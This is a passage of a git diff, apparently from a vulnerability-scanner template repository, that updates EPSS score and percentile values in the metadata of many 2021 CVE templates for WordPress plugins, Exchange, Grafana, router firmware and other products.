b/http/cves/2021/CVE-2021-24934.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2021-24934 cwe-id: CWE-79 epss-score: 0.03752 - epss-percentile: 0.87686 + epss-percentile: 0.87688 cpe: cpe:2.3:a:yellowpencil:visual_css_style_editor:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-24940.yaml b/http/cves/2021/CVE-2021-24940.yaml index de847ea2925..282358598a9 100644 --- a/http/cves/2021/CVE-2021-24940.yaml +++ b/http/cves/2021/CVE-2021-24940.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2021-24940 cwe-id: CWE-79 epss-score: 0.01887 - epss-percentile: 0.8273 + epss-percentile: 0.82727 cpe: cpe:2.3:a:woocommerce:persian-woocommerce:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-24943.yaml b/http/cves/2021/CVE-2021-24943.yaml index 96f248f97b4..61a097b10f6 100644 --- a/http/cves/2021/CVE-2021-24943.yaml +++ b/http/cves/2021/CVE-2021-24943.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2021-24943 cwe-id: CWE-89 epss-score: 0.55452 - epss-percentile: 0.97991 + epss-percentile: 0.97989 cpe: cpe:2.3:a:roundupwp:registrations_for_the_events_calendar:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-24946.yaml b/http/cves/2021/CVE-2021-24946.yaml index 14dabd756a7..fb1ea955e5c 100644 --- a/http/cves/2021/CVE-2021-24946.yaml +++ b/http/cves/2021/CVE-2021-24946.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2021-24946 cwe-id: CWE-89 epss-score: 0.60622 - epss-percentile: 0.98218 + epss-percentile: 0.98217 cpe: cpe:2.3:a:webnus:modern_events_calendar_lite:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-24947.yaml b/http/cves/2021/CVE-2021-24947.yaml index 582b439db60..bd384a0a00d 100644 --- a/http/cves/2021/CVE-2021-24947.yaml +++ b/http/cves/2021/CVE-2021-24947.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-24947 cwe-id: CWE-352,CWE-863 epss-score: 0.10223 - epss-percentile: 0.92923 + epss-percentile: 0.92916 cpe: cpe:2.3:a:thinkupthemes:responsive_vector_maps:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-24956.yaml b/http/cves/2021/CVE-2021-24956.yaml index b6e96268d0e..dd21fc3a89c 100644 --- a/http/cves/2021/CVE-2021-24956.yaml +++ b/http/cves/2021/CVE-2021-24956.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-24956 cwe-id: CWE-79 epss-score: 0.01515 - epss-percentile: 0.80815 + epss-percentile: 0.80805 cpe: cpe:2.3:a:adenion:blog2social:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-24970.yaml b/http/cves/2021/CVE-2021-24970.yaml index 743bb83072e..da5632386fc 100644 --- a/http/cves/2021/CVE-2021-24970.yaml +++ b/http/cves/2021/CVE-2021-24970.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2021-24970 cwe-id: CWE-22 epss-score: 0.19736 - epss-percentile: 0.95246 + epss-percentile: 0.95244 cpe: cpe:2.3:a:plugins360:all-in-one_video_gallery:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-24979.yaml b/http/cves/2021/CVE-2021-24979.yaml index 0a2e4b72e80..2d944f846a2 100644 --- a/http/cves/2021/CVE-2021-24979.yaml +++ b/http/cves/2021/CVE-2021-24979.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2021-24979 cwe-id: CWE-79 epss-score: 0.0269 - epss-percentile: 0.85446 + epss-percentile: 0.85442 cpe: cpe:2.3:a:strangerstudios:paid_memberships_pro:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-24987.yaml b/http/cves/2021/CVE-2021-24987.yaml index addb3b8b26e..bf790def001 100644 --- a/http/cves/2021/CVE-2021-24987.yaml +++ b/http/cves/2021/CVE-2021-24987.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2021-24987 cwe-id: CWE-79 epss-score: 0.06052 - epss-percentile: 0.90448 + epss-percentile: 0.9045 cpe: cpe:2.3:a:heateor:super_socializer:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-24997.yaml b/http/cves/2021/CVE-2021-24997.yaml index 3e6fda943ed..91f002647a1 100644 --- a/http/cves/2021/CVE-2021-24997.yaml +++ b/http/cves/2021/CVE-2021-24997.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-24997 cwe-id: CWE-862 epss-score: 0.04579 - epss-percentile: 0.88888 + epss-percentile: 0.88886 cpe: cpe:2.3:a:wp-guppy:wp_guppy:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-25008.yaml b/http/cves/2021/CVE-2021-25008.yaml index da642ecc8df..88ebffd64a0 100644 --- a/http/cves/2021/CVE-2021-25008.yaml +++ b/http/cves/2021/CVE-2021-25008.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2021-25008 cwe-id: CWE-79 epss-score: 0.03359 - epss-percentile: 0.86996 + epss-percentile: 0.86998 cpe: cpe:2.3:a:codesnippets:code_snippets:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-25016.yaml b/http/cves/2021/CVE-2021-25016.yaml index a6dd152327a..e9c39af65f2 100644 --- a/http/cves/2021/CVE-2021-25016.yaml +++ b/http/cves/2021/CVE-2021-25016.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2021-25016 cwe-id: CWE-79 epss-score: 0.15671 - epss-percentile: 0.94492 + epss-percentile: 0.9449 cpe: cpe:2.3:a:premio:chaty:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-25028.yaml b/http/cves/2021/CVE-2021-25028.yaml index c35507683b7..5b335d8e7bb 100644 --- a/http/cves/2021/CVE-2021-25028.yaml +++ b/http/cves/2021/CVE-2021-25028.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-25028 cwe-id: CWE-601 epss-score: 0.04398 - epss-percentile: 0.88658 + epss-percentile: 0.88656 cpe: cpe:2.3:a:tri:event_tickets:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-25032.yaml b/http/cves/2021/CVE-2021-25032.yaml index 09181bfef0a..6c66c0eadee 100644 --- a/http/cves/2021/CVE-2021-25032.yaml +++ b/http/cves/2021/CVE-2021-25032.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-25032 cwe-id: CWE-352 epss-score: 0.81889 - epss-percentile: 0.99163 + epss-percentile: 0.99165 cpe: cpe:2.3:a:publishpress:capabilities:*:*:*:*:-:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-25033.yaml b/http/cves/2021/CVE-2021-25033.yaml index 63a8db7754a..cbaa19ad163 100644 --- a/http/cves/2021/CVE-2021-25033.yaml +++ b/http/cves/2021/CVE-2021-25033.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2021-25033 cwe-id: CWE-601 epss-score: 0.01059 - epss-percentile: 0.77176 + epss-percentile: 0.77169 cpe: cpe:2.3:a:noptin:noptin:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-25052.yaml b/http/cves/2021/CVE-2021-25052.yaml index cc182de2c33..30568051135 100644 --- a/http/cves/2021/CVE-2021-25052.yaml +++ b/http/cves/2021/CVE-2021-25052.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-25052 cwe-id: CWE-352 epss-score: 0.42408 - epss-percentile: 0.97342 + epss-percentile: 0.97339 cpe: cpe:2.3:a:wow-company:button_generator:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-25055.yaml b/http/cves/2021/CVE-2021-25055.yaml index 1d8b6beb3f4..0c46c45d6e4 100644 --- a/http/cves/2021/CVE-2021-25055.yaml +++ b/http/cves/2021/CVE-2021-25055.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-25055 cwe-id: CWE-79 epss-score: 0.01696 - epss-percentile: 0.81832 + epss-percentile: 0.81828 cpe: cpe:2.3:a:feedwordpress_project:feedwordpress:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-25063.yaml b/http/cves/2021/CVE-2021-25063.yaml index d21236e6485..db625b6eedd 100644 --- a/http/cves/2021/CVE-2021-25063.yaml +++ b/http/cves/2021/CVE-2021-25063.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2021-25063 cwe-id: CWE-79 epss-score: 0.01155 - epss-percentile: 0.78088 + epss-percentile: 0.78083 cpe: cpe:2.3:a:cf7skins:contact_form_7_skins:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-25065.yaml b/http/cves/2021/CVE-2021-25065.yaml index 6450a2fe841..3cf75bcc112 100644 --- a/http/cves/2021/CVE-2021-25065.yaml +++ b/http/cves/2021/CVE-2021-25065.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-25065 cwe-id: CWE-79 epss-score: 0.03142 - epss-percentile: 0.86494 + epss-percentile: 0.86496 cpe: cpe:2.3:a:smashballoon:smash_balloon_social_post_feed:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-25067.yaml b/http/cves/2021/CVE-2021-25067.yaml index cbe02a82562..bdad9e4586a 100644 --- a/http/cves/2021/CVE-2021-25067.yaml +++ b/http/cves/2021/CVE-2021-25067.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-25067 cwe-id: CWE-79 epss-score: 0.0646 - epss-percentile: 0.90783 + epss-percentile: 0.90782 cpe: cpe:2.3:a:pluginops:landing_page:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-25074.yaml b/http/cves/2021/CVE-2021-25074.yaml index bc340fa8864..0f1fb8565d1 100644 --- a/http/cves/2021/CVE-2021-25074.yaml +++ b/http/cves/2021/CVE-2021-25074.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2021-25074 cwe-id: CWE-601 epss-score: 0.01001 - epss-percentile: 0.76518 + epss-percentile: 0.76509 cpe: cpe:2.3:a:webp_converter_for_media_project:webp_converter_for_media:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-25075.yaml b/http/cves/2021/CVE-2021-25075.yaml index 802723fe96c..868d9ccfa8a 100644 --- a/http/cves/2021/CVE-2021-25075.yaml +++ b/http/cves/2021/CVE-2021-25075.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-25075 cwe-id: CWE-862 epss-score: 0.12492 - epss-percentile: 0.93709 + epss-percentile: 0.93706 cpe: cpe:2.3:a:wpdevart:duplicate_page_or_post:*:*:*:*:*:wordpress:*:* metadata: max-request: 3 diff --git a/http/cves/2021/CVE-2021-25078.yaml b/http/cves/2021/CVE-2021-25078.yaml index faba1037faa..f703fd5e0a2 100644 --- a/http/cves/2021/CVE-2021-25078.yaml +++ b/http/cves/2021/CVE-2021-25078.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2021-25078 cwe-id: CWE-79 epss-score: 0.05997 - epss-percentile: 0.90403 + epss-percentile: 0.90405 cpe: cpe:2.3:a:wpaffiliatemanager:affiliates_manager:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-25079.yaml b/http/cves/2021/CVE-2021-25079.yaml index c3d59c7c93d..2e4d0810b4f 100644 --- a/http/cves/2021/CVE-2021-25079.yaml +++ b/http/cves/2021/CVE-2021-25079.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2021-25079 cwe-id: CWE-79 epss-score: 0.01396 - epss-percentile: 0.79994 + epss-percentile: 0.79984 cpe: cpe:2.3:a:crmperks:contact_form_entries:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-25082.yaml b/http/cves/2021/CVE-2021-25082.yaml index a907fd996f9..370a516cdc3 100644 --- a/http/cves/2021/CVE-2021-25082.yaml +++ b/http/cves/2021/CVE-2021-25082.yaml @@ -15,8 +15,8 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2021-25082 classification: cve-id: CVE-2021-25082 - epss-score: 0.31753 - epss-percentile: 0.96657 + epss-score: 0.19891 + epss-percentile: 0.95267 cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cwe-id: CWE-98 diff --git a/http/cves/2021/CVE-2021-25099.yaml b/http/cves/2021/CVE-2021-25099.yaml index 9924984785f..874cbc9250a 100644 --- a/http/cves/2021/CVE-2021-25099.yaml +++ b/http/cves/2021/CVE-2021-25099.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2021-25099 cwe-id: CWE-79 epss-score: 0.02406 - epss-percentile: 0.84671 + epss-percentile: 0.84669 cpe: cpe:2.3:a:givewp:givewp:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-25111.yaml b/http/cves/2021/CVE-2021-25111.yaml index f489b332b13..2ea5c1f2a40 100644 --- a/http/cves/2021/CVE-2021-25111.yaml +++ b/http/cves/2021/CVE-2021-25111.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2021-25111 cwe-id: CWE-601 epss-score: 0.01767 - epss-percentile: 0.82195 + epss-percentile: 0.82193 cpe: cpe:2.3:a:english_wordpress_admin_project:english_wordpress_admin:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-25112.yaml b/http/cves/2021/CVE-2021-25112.yaml index c808993c945..7f090e81dfa 100644 --- a/http/cves/2021/CVE-2021-25112.yaml +++ b/http/cves/2021/CVE-2021-25112.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-25112 cwe-id: CWE-79 epss-score: 0.05226 - epss-percentile: 0.89644 + epss-percentile: 0.8964 cpe: cpe:2.3:a:i-plugins:whmcs_bridge:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-25118.yaml b/http/cves/2021/CVE-2021-25118.yaml index 1926b37387f..159a36800fe 100644 --- a/http/cves/2021/CVE-2021-25118.yaml +++ b/http/cves/2021/CVE-2021-25118.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2021-25118 cwe-id: CWE-200 epss-score: 0.27358 - epss-percentile: 0.96256 + epss-percentile: 0.96259 cpe: cpe:2.3:a:yoast:yoast_seo:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-25120.yaml b/http/cves/2021/CVE-2021-25120.yaml index 529bdc2b29d..968fcf2fb81 100644 --- a/http/cves/2021/CVE-2021-25120.yaml +++ b/http/cves/2021/CVE-2021-25120.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-25120 cwe-id: CWE-79 epss-score: 0.54081 - epss-percentile: 0.97924 + epss-percentile: 0.97922 cpe: cpe:2.3:a:easysocialfeed:easy_social_feed:*:*:*:*:pro:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-25161.yaml b/http/cves/2021/CVE-2021-25161.yaml index 1d3431d2c67..f9192a9bf92 100644 --- a/http/cves/2021/CVE-2021-25161.yaml +++ b/http/cves/2021/CVE-2021-25161.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2021-25161 cwe-id: CWE-79 epss-score: 0.02593 - epss-percentile: 0.85198 + epss-percentile: 0.85194 metadata: verified: true max-request: 1 diff --git a/http/cves/2021/CVE-2021-25646.yaml b/http/cves/2021/CVE-2021-25646.yaml index c2defe833ec..f31c976e061 100644 --- a/http/cves/2021/CVE-2021-25646.yaml +++ b/http/cves/2021/CVE-2021-25646.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2021-25646 cwe-id: CWE-732 epss-score: 0.94055 - epss-percentile: 0.99896 + epss-percentile: 0.99893 cpe: cpe:2.3:a:apache:druid:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-26085.yaml b/http/cves/2021/CVE-2021-26085.yaml index 78abdea65e2..2be818080ad 100644 --- a/http/cves/2021/CVE-2021-26085.yaml +++ b/http/cves/2021/CVE-2021-26085.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-26085 cwe-id: CWE-425 epss-score: 0.94012 - epss-percentile: 0.99887 + epss-percentile: 0.99886 cpe: cpe:2.3:a:atlassian:confluence_data_center:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-26599.yaml b/http/cves/2021/CVE-2021-26599.yaml index f7f1305a79c..818b57c7479 100644 --- a/http/cves/2021/CVE-2021-26599.yaml +++ b/http/cves/2021/CVE-2021-26599.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-26599 cwe-id: CWE-89 epss-score: 0.04018 - epss-percentile: 0.88138 + epss-percentile: 0.8814 cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 metadata: diff --git a/http/cves/2021/CVE-2021-26702.yaml b/http/cves/2021/CVE-2021-26702.yaml index 89f5b13e6c8..85fad1cc29f 100644 --- a/http/cves/2021/CVE-2021-26702.yaml +++ b/http/cves/2021/CVE-2021-26702.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-26702 cwe-id: CWE-79 epss-score: 0.04853 - epss-percentile: 0.89233 + epss-percentile: 0.8923 cpe: cpe:2.3:a:eprints:eprints:3.4.2:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-26812.yaml b/http/cves/2021/CVE-2021-26812.yaml index e972a1be31b..c990a43fbed 100644 --- a/http/cves/2021/CVE-2021-26812.yaml +++ b/http/cves/2021/CVE-2021-26812.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2021-26812 cwe-id: CWE-79 epss-score: 0.19091 - epss-percentile: 0.95135 + epss-percentile: 0.95134 cpe: cpe:2.3:a:jitsi:meet:*:*:*:*:*:moodle:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-26855.yaml b/http/cves/2021/CVE-2021-26855.yaml index 84ce16e4395..8f82dfcc7bc 100644 --- a/http/cves/2021/CVE-2021-26855.yaml +++ b/http/cves/2021/CVE-2021-26855.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.1 cve-id: CVE-2021-26855 cwe-id: CWE-918 - epss-score: 0.94351 - epss-percentile: 0.99955 + epss-score: 0.94266 + epss-percentile: 0.9993 cpe: cpe:2.3:a:microsoft:exchange_server:2013:cumulative_update_21:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-27124.yaml b/http/cves/2021/CVE-2021-27124.yaml index cc02f8b7a4b..3c176aa81bf 100644 --- a/http/cves/2021/CVE-2021-27124.yaml +++ b/http/cves/2021/CVE-2021-27124.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2021-27124 cwe-id: CWE-89 epss-score: 0.22289 - epss-percentile: 0.95627 + epss-percentile: 0.95632 cpe: cpe:2.3:a:doctor_appointment_system_project:doctor_appointment_system:1.0:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2021/CVE-2021-27132.yaml b/http/cves/2021/CVE-2021-27132.yaml index 04a3df03e82..b72d01ab6a1 100644 --- a/http/cves/2021/CVE-2021-27132.yaml +++ b/http/cves/2021/CVE-2021-27132.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-27132 cwe-id: CWE-74 epss-score: 0.7855 - epss-percentile: 0.98992 + epss-percentile: 0.98991 cpe: cpe:2.3:o:sercomm:agcombo_vd625_firmware:agsot_2.1.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-27309.yaml b/http/cves/2021/CVE-2021-27309.yaml index fb01bf38fbc..1006c66b980 100644 --- a/http/cves/2021/CVE-2021-27309.yaml +++ b/http/cves/2021/CVE-2021-27309.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-27309 cwe-id: CWE-79 epss-score: 0.00874 - epss-percentile: 0.74793 + epss-percentile: 0.74775 cpe: cpe:2.3:a:csphere:clansphere:2011.4:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-27314.yaml b/http/cves/2021/CVE-2021-27314.yaml index c9e61770142..a182723485b 100644 --- a/http/cves/2021/CVE-2021-27314.yaml +++ b/http/cves/2021/CVE-2021-27314.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2021-27314 cwe-id: CWE-89 epss-score: 0.78706 - epss-percentile: 0.99001 + epss-percentile: 0.98999 cpe: cpe:2.3:a:doctor_appointment_system_project:doctor_appointment_system:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-27315.yaml b/http/cves/2021/CVE-2021-27315.yaml index e3a1139ec15..7e3da29d0fb 100644 --- a/http/cves/2021/CVE-2021-27315.yaml +++ b/http/cves/2021/CVE-2021-27315.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2021-27315 cwe-id: CWE-89 epss-score: 0.71381 - epss-percentile: 0.98672 + epss-percentile: 0.98671 cpe: cpe:2.3:a:doctor_appointment_system_project:doctor_appointment_system:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-27316.yaml b/http/cves/2021/CVE-2021-27316.yaml index 55c05105ae2..2216db4fc65 100644 --- a/http/cves/2021/CVE-2021-27316.yaml +++ b/http/cves/2021/CVE-2021-27316.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2021-27316 cwe-id: CWE-89 epss-score: 0.71381 - epss-percentile: 0.98672 + epss-percentile: 0.98671 cpe: cpe:2.3:a:doctor_appointment_system_project:doctor_appointment_system:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-27330.yaml b/http/cves/2021/CVE-2021-27330.yaml index bb6ebae0ce1..cf6d0bd7636 100644 --- a/http/cves/2021/CVE-2021-27330.yaml +++ b/http/cves/2021/CVE-2021-27330.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2021-27330 cwe-id: CWE-79 epss-score: 0.22381 - epss-percentile: 0.95635 + epss-percentile: 0.95641 cpe: cpe:2.3:a:triconsole:datepicker_calendar:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-27358.yaml b/http/cves/2021/CVE-2021-27358.yaml index 0a1dd0309c0..04856982ba8 100644 --- a/http/cves/2021/CVE-2021-27358.yaml +++ b/http/cves/2021/CVE-2021-27358.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-27358 cwe-id: CWE-306 epss-score: 0.87049 - epss-percentile: 0.99414 + epss-percentile: 0.99416 cpe: cpe:2.3:a:grafana:grafana:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-27520.yaml b/http/cves/2021/CVE-2021-27520.yaml index 34d4ac12203..30400874ec8 100644 --- a/http/cves/2021/CVE-2021-27520.yaml +++ b/http/cves/2021/CVE-2021-27520.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2021-27520 cwe-id: CWE-79 epss-score: 0.01118 - epss-percentile: 0.7777 + epss-percentile: 0.77767 cpe: cpe:2.3:a:fudforum:fudforum:3.1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-27858.yaml b/http/cves/2021/CVE-2021-27858.yaml index 700b3d56212..646f6b93559 100644 --- a/http/cves/2021/CVE-2021-27858.yaml +++ b/http/cves/2021/CVE-2021-27858.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-27858 cwe-id: CWE-862 epss-score: 0.37835 - epss-percentile: 0.97082 + epss-percentile: 0.97085 cpe: cpe:2.3:o:fatpipeinc:warp_firmware:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-27909.yaml b/http/cves/2021/CVE-2021-27909.yaml index 46baffb9e55..757b5dfb157 100644 --- a/http/cves/2021/CVE-2021-27909.yaml +++ b/http/cves/2021/CVE-2021-27909.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2021-27909 cwe-id: CWE-79 epss-score: 0.18658 - epss-percentile: 0.95057 + epss-percentile: 0.95056 cpe: cpe:2.3:a:acquia:mautic:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-27931.yaml b/http/cves/2021/CVE-2021-27931.yaml index b29439b5d52..d839697851e 100644 --- a/http/cves/2021/CVE-2021-27931.yaml +++ b/http/cves/2021/CVE-2021-27931.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2021-27931 cwe-id: CWE-611 epss-score: 0.91224 - epss-percentile: 0.99631 + epss-percentile: 0.9963 cpe: cpe:2.3:a:lumis:lumis_experience_platform:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-27964.yaml b/http/cves/2021/CVE-2021-27964.yaml index e40d0c9203b..06f1e46636a 100644 --- a/http/cves/2021/CVE-2021-27964.yaml +++ b/http/cves/2021/CVE-2021-27964.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2021-27964 cwe-id: CWE-434 epss-score: 0.8087 - epss-percentile: 0.99107 + epss-percentile: 0.99109 cpe: cpe:2.3:a:sfcyazilim:sonlogger:*:*:*:*:*:*:*:* metadata: vendor: sfcyazilim diff --git a/http/cves/2021/CVE-2021-28149.yaml b/http/cves/2021/CVE-2021-28149.yaml index 4aeedb688bc..f63d445afdf 100644 --- a/http/cves/2021/CVE-2021-28149.yaml +++ b/http/cves/2021/CVE-2021-28149.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2021-28149 cwe-id: CWE-22 epss-score: 0.90658 - epss-percentile: 0.99597 + epss-percentile: 0.99595 cpe: cpe:2.3:o:hongdian:h8922_firmware:3.0.5:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-28150.yaml b/http/cves/2021/CVE-2021-28150.yaml index 66f31748e1b..28405f820e3 100644 --- a/http/cves/2021/CVE-2021-28150.yaml +++ b/http/cves/2021/CVE-2021-28150.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-28150 cwe-id: CWE-425 epss-score: 0.78839 - epss-percentile: 0.99006 + epss-percentile: 0.99005 cpe: cpe:2.3:o:hongdian:h8922_firmware:3.0.5:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-28151.yaml b/http/cves/2021/CVE-2021-28151.yaml index ab19ac36a46..888707a8281 100644 --- a/http/cves/2021/CVE-2021-28151.yaml +++ b/http/cves/2021/CVE-2021-28151.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2021-28151 cwe-id: CWE-78 epss-score: 0.92677 - epss-percentile: 0.99736 + epss-percentile: 0.99735 cpe: cpe:2.3:o:hongdian:h8922_firmware:3.0.5:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-28377.yaml b/http/cves/2021/CVE-2021-28377.yaml index ff529749330..13ac451b5a9 100644 --- a/http/cves/2021/CVE-2021-28377.yaml +++ b/http/cves/2021/CVE-2021-28377.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2021-28377 cwe-id: CWE-22 epss-score: 0.4612 - epss-percentile: 0.97543 + epss-percentile: 0.97539 cpe: cpe:2.3:a:chronoengine:chronoforums:2.0.11:*:*:*:*:joomla:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-28799.yaml b/http/cves/2021/CVE-2021-28799.yaml index 5a88ffd50e6..bcede43c495 100644 --- a/http/cves/2021/CVE-2021-28799.yaml +++ b/http/cves/2021/CVE-2021-28799.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-28799 cwe-id: CWE-285 - epss-score: 0.909 - epss-percentile: 0.99611 + epss-score: 0.91146 + epss-percentile: 0.99625 cpe: cpe:2.3:a:qnap:hybrid_backup_sync:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-28937.yaml b/http/cves/2021/CVE-2021-28937.yaml index 03d2e04ce9a..b58d4530573 100644 --- a/http/cves/2021/CVE-2021-28937.yaml +++ b/http/cves/2021/CVE-2021-28937.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-28937 cwe-id: CWE-312 epss-score: 0.33834 - epss-percentile: 0.96824 + epss-percentile: 0.96825 cpe: cpe:2.3:h:acexy:wireless-n_wifi_repeater:1.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-29006.yaml b/http/cves/2021/CVE-2021-29006.yaml index cb58f55c8b6..aa2bc0a58a2 100644 --- a/http/cves/2021/CVE-2021-29006.yaml +++ b/http/cves/2021/CVE-2021-29006.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2021-29006 cwe-id: CWE-22 epss-score: 0.30402 - epss-percentile: 0.96552 + epss-percentile: 0.96554 cpe: cpe:2.3:a:rconfig:rconfig:3.9.6:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-29203.yaml b/http/cves/2021/CVE-2021-29203.yaml index 9e5c42f5349..38de35eb094 100644 --- a/http/cves/2021/CVE-2021-29203.yaml +++ 